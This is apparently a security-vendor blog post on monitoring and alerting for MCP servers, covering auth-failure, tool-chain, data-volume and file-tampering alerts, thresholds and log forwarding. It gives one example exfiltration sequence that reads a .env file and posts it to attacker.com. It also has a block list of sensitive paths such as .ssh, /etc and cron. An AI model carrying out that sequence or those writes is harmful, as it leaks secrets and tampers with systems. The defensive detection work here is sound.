Engineering · Observability · Security
MCP Server Security Monitoring and Alerting: What to Alert On, Threshold Calibration, and How to Avoid Alert Fatigue
Most MCP servers log nothing beyond a startup message. The ones that do log usually emit raw error stacks — the wrong signal for security operations. Here is a practical framework: four alert categories, how to calibrate thresholds against real traffic, how to route alerts to the right team, and what SkillAudit checks when it grades your observability posture.
Published 2026-06-14 · 3,400 words · ← All posts
Why MCP monitoring is different from API monitoring
Traditional API monitoring focuses on latency, error rate, and throughput. These metrics tell you when something is broken. MCP server security monitoring needs to answer a different question: is the server being used in ways its authors didn't intend?
Two properties make MCP servers unusual from a monitoring perspective:
1. The caller is an LLM agent, not a human. A human clicking a UI generates ~1–5 API calls per interaction. An LLM agent planning a multi-step task can generate 50–200 tool calls in a single session. Burst traffic that looks like an attack in a traditional API may be a normal agentic loop. Your thresholds need to account for this.
2. Tool calls compose into emergent behaviors. A single call to read_file is benign. A single call to fetch_url is benign. A sequence of read_file(.env) → fetch_url(attacker.com, body=file_content) is a data exfiltration attack — but no individual call raises an alarm if you only look at calls in isolation. Security monitoring for MCP servers must track sessions and sequences, not just individual requests.
The SkillAudit observability axis checks for three things: whether structured security events are emitted (not just generic errors), whether the log format is injection-safe (JSON, not string concatenation), and whether logs are forwarded to an append-only external sink rather than staying on the same host being audited. Servers with no structured logging default to a MEDIUM finding on the observability sub-score.
The four alert categories
Start with four categories. Every alert in your MCP server should map to one of them. If it doesn't, question whether it belongs in a security alert at all.
Authentication and authorization failures
Failed token validation, expired credentials, IDOR attempts — signals that an entity is trying to access something it shouldn't
Auth failures are the most reliable security signal because they represent a hard system boundary being tested. Every failed auth check should emit a structured event with: caller identity (or the value that was presented as identity if verification failed), the tool being requested, the resource being accessed, the specific failure reason (expired, missing, invalid format, revoked), and the caller's session state (first failure or Nth in a window).
Alert thresholds:
- P0 (page immediately): 3 auth failures from the same caller within 30 seconds — this is credential stuffing or a replay attack
- P1 (alert within 5 minutes): Any IDOR attempt — a caller accessing a resource with a valid token but for a different caller's resource ID
- P2 (batch to daily digest): Isolated single auth failures — likely a misconfigured client, not an attack
// Structured auth failure event
log.security({
event: 'auth_failure',
reason: 'token_expired', // expired | missing | invalid | revoked | idor
callerId: hash(presentedCallerId), // hashed — never log raw bearer token
toolRequested: 'read_file',
resourceId: args.path,
sessionFailureCount: session.authFailures,
sessionAge: Date.now() - session.startedAt,
ts: Date.now()
});
The IDOR case deserves special handling. When a caller presents a valid token but the resource ID belongs to a different caller, log the resource owner's hashed ID (not their raw identifier) alongside the caller's hashed ID. This creates a correlation path for incident investigation without logging PII in the alert.
Anomalous tool call patterns
Tool call sequences that deviate from normal agentic behavior — burst patterns, cross-category chains, off-hours activity
This is the hardest category to calibrate because "anomalous" depends on what normal looks like for your server. But four pattern classes are reliable signals across most MCP servers:
Burst detection: More than N calls of the same tool within T seconds from the same caller. The challenge is that LLM agents legitimately generate bursts during planning loops. The key differentiator is whether the burst contains unique arguments or the same argument repeated. A planning loop calling list_directory 10 times with different paths is normal. The same call 10 times with the same path is a loop bug or a probe.
Cross-category chain detection: A retrieval tool followed immediately by an external-network tool is the canonical exfiltration chain signature. Detecting it requires tagging each tool with its effect class (retrieval / mutation / external) and maintaining a per-session call log. The chain [retrieval, retrieval, external] within a 30-second window should trigger a P1 alert unless the caller has explicitly scoped the allow:retrieval-to-external-chain permission.
Off-hours activity: If your users are internal and primarily work 9–5, a cluster of tool calls at 3 AM is suspicious. This is easy to alert on but requires knowing your traffic baseline. Do not enable this alert until you have two weeks of normal traffic data.
Tool enumeration: A caller that invokes every tool your server exposes exactly once, in quick succession, is probing your surface. This is a reconnaissance pattern. The signature: N distinct tools called within 60 seconds with minimal arguments — args that look like the minimum required to avoid a validation error rather than real use.
// Cross-category chain detection
function isExfiltrationPattern(callLog: ToolCall[]): boolean {
const recent = callLog.filter(c => Date.now() - c.ts < 30_000);
const hasRetrieval = recent.some(c => c.effectClass === 'retrieval');
const hasExternal = recent.some(c => c.effectClass === 'external');
const hasMutation = recent.some(c => c.effectClass === 'mutation');
// retrieval + external with no mutation = potential exfiltration
return hasRetrieval && hasExternal && !hasMutation;
}
// Run after each tool call that completes successfully
if (isExfiltrationPattern(session.callLog)) {
log.security({
event: 'chain_guard_alert',
pattern: 'retrieval_to_external',
callSequence: session.callLog.slice(-10).map(c => c.tool),
ts: Date.now()
});
}
Data volume and exfiltration signals
High-volume read operations, large response payloads, and external-network calls that correlate with retrieval spikes
Tool call count alone doesn't capture exfiltration risk — a server that returns 1 KB per call is different from one that streams multi-MB files. Volume-based alerts add a second axis that catches exfiltration attempts that stay under call-count thresholds by requesting large payloads instead of many calls.
Track three volume metrics per session:
- Cumulative response bytes: Total bytes returned to the caller across all tool calls in the session. Alert if this exceeds your 99th-percentile session byte volume (establish this from baseline traffic — for most MCP servers serving LLM agents, it will be 1–10 MB per session).
- Single-call response size: If one tool call returns more than your configured ceiling (e.g., 5 MB), alert regardless of session total. A single
read_filecall that returns 5 MB of data is almost certainly reading the wrong file or responding to an oversized argument. - External call byte volume: Total bytes sent in outbound requests from tools that make external network calls. A small inbound query producing a large outbound payload is a classic exfiltration indicator.
class SessionVolumeGuard {
private inboundBytes = 0;
private outboundBytes = 0;
private readonly INBOUND_CEILING = 10 * 1024 * 1024; // 10 MB
private readonly OUTBOUND_CEILING = 1 * 1024 * 1024; // 1 MB
recordResponse(toolName: string, responseBytes: number) {
this.inboundBytes += responseBytes;
if (responseBytes > 5 * 1024 * 1024) {
log.security({ event: 'large_single_response', tool: toolName, bytes: responseBytes, ts: Date.now() });
}
if (this.inboundBytes > this.INBOUND_CEILING) {
log.security({ event: 'session_volume_ceiling', totalBytes: this.inboundBytes, ts: Date.now() });
}
}
recordOutbound(toolName: string, bodyBytes: number) {
this.outboundBytes += bodyBytes;
if (this.outboundBytes > this.OUTBOUND_CEILING) {
log.security({ event: 'outbound_volume_ceiling', tool: toolName, totalBytes: this.outboundBytes, ts: Date.now() });
}
}
}
Volume alerts have a high false-positive rate in servers that legitimately process large files. Before enabling the session ceiling alert, collect a week of production response-size data and set the threshold at the 99th percentile plus 50% headroom. This approach catches true anomalies while suppressing the daily heavy-user traffic that will otherwise dominate your alert queue.
Configuration and filesystem tampering signals
Write operations on sensitive paths, permission scope escalation, and server configuration changes at runtime
If your MCP server exposes any write tools — filesystem, database, message queue — those write operations are the highest-risk surface in your server. Most write tools legitimately write to application data paths. The sensitive cases are writes to infrastructure-level paths that the tool wasn't designed to touch.
Define a set of protected path patterns per tool. Any write to a protected pattern should emit a P1 alert and be blocked before the write completes:
const PROTECTED_PATH_PATTERNS = [
/\.env/, // environment files
/\.git\//, // git internals
/\.ssh\//, // SSH keys
/\/etc\//, // system config
/\.github\//, // CI/CD workflows
/cron/i, // cron job files
/\.(sh|bash|zsh|py|rb)$/, // executable scripts
/node_modules\//, // dependency tree
];
function isProtectedPath(path: string): boolean {
return PROTECTED_PATH_PATTERNS.some(p => p.test(path));
}
// In write_file handler — check before any write
if (isProtectedPath(args.path)) {
log.security({
event: 'write_to_protected_path',
path: args.path, // log the path — not the content
callerId: session.callerId,
ts: Date.now()
});
throw new ToolError('FORBIDDEN', 'Write target is not allowed');
}
The block-before-write pattern matters here. Log the attempt and throw before touching the filesystem. An alert that fires after the write has succeeded is observability, not security.
A second class of tampering signal applies if your server exposes any tool that modifies its own configuration — changing rate limits, updating allowed scopes, adjusting feature flags. These operations should always require a second authentication factor beyond the standard session token (a separate admin token or an explicit confirmation parameter) and always emit a P1 alert.
Threshold calibration: how to find the right numbers
Alert thresholds are where most MCP server monitoring programs fail. Thresholds set too low create an alert storm that on-call engineers learn to ignore. Thresholds set too high miss real attacks. The right approach is data-driven calibration from your own baseline, not numbers from a blog post.
Step 1 — Establish a baseline (2 weeks minimum)
Deploy structured logging for a fortnight before enabling any alerts. Log every tool call with: caller ID hash, tool name, response bytes, latency, session age. Do not alert on anything during this period. You are building the histogram of normal behavior.
Step 2 — Calculate percentile thresholds
For each metric you plan to alert on, compute p99 from the baseline. Your alert threshold = p99 × 1.5. The 1.5× headroom absorbs legitimate traffic spikes (Monday morning rush, a large automated workflow) without triggering on noise.
Step 3 — Segment by caller type
LLM agents generate dramatically more traffic than human-driven integrations. If you can distinguish caller types (by token claim, by client identifier in the auth header, by call-rate signature), use per-segment thresholds. A threshold calibrated on mixed traffic will be too high for humans and too low for agents.
Step 4 — Review and halve after 30 days
After your first 30 days of production alerts, audit the false-positive rate. If more than 20% of P1 alerts resolve as false positives, your thresholds are too sensitive — raise them by 25%. If you have zero P1 alerts and no incidents, your thresholds may be too high — lower by 25%. Re-tune every 30 days until your false-positive rate is under 10%.
Alert routing: who gets what
An alert that pages the wrong person, or pages everyone, will be ignored. Map alert severity to team before you deploy monitoring:
| Severity | Alert category | Route to | SLA |
|---|---|---|---|
| P0 | Auth failure burst (≥3 failures in 30s from same caller) | On-call security engineer + server owner | 15 minutes to acknowledge |
| P0 | Write to protected path (blocked) | On-call security engineer + server owner | 15 minutes to acknowledge |
| P1 | Cross-category chain alert (retrieval → external without chain scope) | Server owner + security team Slack channel | 4 hours to investigate |
| P1 | IDOR attempt (valid token, wrong resource) | Server owner + security team Slack channel | 4 hours to investigate |
| P1 | Session byte ceiling exceeded | Server owner | 4 hours to investigate |
| P2 | Tool enumeration pattern | Security team daily digest | 24 hours |
| P2 | Off-hours activity | Security team daily digest | 24 hours |
| INFO | Single auth failure | Log only — no alert | Review in weekly report |
Alert fatigue is a security vulnerability. If your on-call rotation is receiving more than 5 P1 alerts per day that resolve as false positives, the alert program is producing negative security value — engineers stop looking, and real attacks get lost in noise. Track your false-positive rate as a first-class metric and treat a high false-positive rate as a P2 incident.
Integration with SIEM and incident response
Structured JSON logs are useful on their own, but they become powerful when forwarded to a SIEM (Splunk, Elastic Security, Datadog SIEM, or an open-source alternative like Wazuh). The structured log schema from earlier in this post is designed to be SIEM-friendly: every event has a consistent event field for filtering, a consistent ts field for time-series analysis, and hashed identifiers for correlation without PII.
Three SIEM use cases that are worth wiring up immediately:
Correlation across multiple MCP servers: If your infrastructure includes multiple MCP servers, a single SIEM receiving logs from all of them can detect attacks that hop between servers — a caller that fails auth on Server A and immediately tries Server B with the same credential is a credential-stuffing attack across your entire fleet, invisible if you only look at per-server logs.
Retrospective investigation: After an incident, you need to answer "what did this caller do in the 30 minutes before the alert fired?" SIEM with structured logs answers this in seconds. A server that only logs to stdout with raw error messages answers it in hours of log parsing, if at all.
Baseline drift detection: SIEM can build a rolling model of normal tool call patterns per caller and alert when a caller's behavior diverges significantly from their own baseline — a more precise signal than fixed thresholds for high-volume callers whose usage patterns are complex.
Log forwarding that survives an incident
One detail that matters operationally: if your logs are stored only on the MCP server's own host, an attacker who compromises the server can delete the logs before your investigation begins. Forward logs to an append-only external sink from the moment they are written. The standard pattern:
import pino from 'pino';
import pinoms from 'pino-multi-stream';
// Two streams: local file (for debug) + external append-only sink
const streams = pinoms.multistream([
{ stream: process.stdout },
{
stream: pinoCloudWatch({
logGroupName: '/mcp-server/security',
logStreamName: `security-${process.env.INSTANCE_ID}`,
// CloudWatch Logs enforces append-only via IAM — no delete permission for the server role
})
}
]);
export const log = {
security: (event: SecurityEvent) => streams.write(JSON.stringify({ level: 'security', ...event }) + '\n')
};
The CloudWatch example works for AWS deployments. For other environments: Loki with an append-only log pipeline, an S3 bucket with object lock enabled, or a managed SIEM ingestion endpoint — any option where the server process does not have delete or overwrite access to its own log store.
The three common mistakes
Mistake 1: Logging in the error handler only. If your only security events come from exception handlers, you miss the majority of attack patterns — most successful tool chaining attacks and data exfiltration attempts complete without throwing exceptions. Security events should be emitted after successful calls that match anomaly patterns, not only on failure.
Mistake 2: Including credential values in logs. The most common credential leak in MCP servers is a console.log(process.env) or an error message that includes the full token value. Security event logs should contain hashed caller IDs and argsHash (a SHA-256 of the arguments for correlation) but never the raw argument values, never the raw token, and never env-var values. See the anatomy of a credential leak post for a census of how this goes wrong across the community corpus.
Mistake 3: Alerting on every anomaly equally. Not every alert deserves a page. A server that pages on every single auth failure will create an alert storm every time a client has a stale token. Tiered severity (P0/P1/P2/INFO) with appropriate routing for each tier is what makes alert programs sustainable. Build the tiers before you enable any alerts in production.
What a monitoring-ready server looks like
After implementing the framework above, a monitoring-ready MCP server has these properties:
- Every security-relevant event emits a structured JSON log line with
event,ts, hashed caller ID, and relevant context — no raw error strings, no credential values - Auth failures, chain guard blocks, protected-path write attempts, and volume ceiling breaches each have a named event type that maps to an alert rule
- A per-session call log tracks tool sequence and effect class for chain detection
- Alert thresholds are calibrated from baseline traffic, not from a blog post
- Logs forward to an append-only external sink that the server process cannot delete
- Alert routing is documented: P0 pages on-call within 15 minutes, P1 alerts the team channel within 4 hours, P2 batches to a daily digest
SkillAudit grade impact
The SkillAudit observability sub-score currently contributes to the Security axis. Here is how the monitoring patterns in this post map to findings and grade effects:
A server that implements the full framework from this post — structured events, chain detection, external forwarding, no credential values in logs — will score between 90 and 100 on the Security axis, assuming it already passes the static checks for SSRF and command injection. Monitoring doesn't fix code vulnerabilities, but it does demonstrate operational maturity that directly affects the Maintenance sub-score as well.
Starting point: the minimum viable monitoring setup
If you are starting from zero and need a realistic first step, this is the minimum viable setup that will move your SkillAudit grade and give you genuine security value:
- Add one security logger — a thin wrapper around
pinothat writes JSON to stdout. No configuration beyondJSON.stringify. Do this first — it is ten lines of code. - Instrument two events —
auth_failureandchain_guard_alert. These two events catch the majority of active attacks and have clear semantics. Add them before anything else. - Add one alert rule — page on ≥3 auth failures from the same caller in 30 seconds. Set this up in your existing alerting system (PagerDuty, OpsGenie, Slack alert bot). This is your only P0 alert for the first month.
- Forward to one external sink — whatever your existing infrastructure uses (CloudWatch, Datadog, Loki). If you have nothing, a free Datadog trial works for the first 30 days.
- Review after 30 days — look at the auth failure events. Are there any callers with repeated failures? Any cross-category chains that fired? Tune the chain detection threshold based on what you see.
Everything else in this post is additive on top of this foundation. The minimum viable setup takes 2–4 hours to implement and will surface real security signals within the first week of production traffic.
Get your MCP server's observability score
SkillAudit checks for structured security event logging, credential safety in logs, and external forwarding as part of every audit. Paste your GitHub URL and see your score in 60 seconds.
Run a free audit →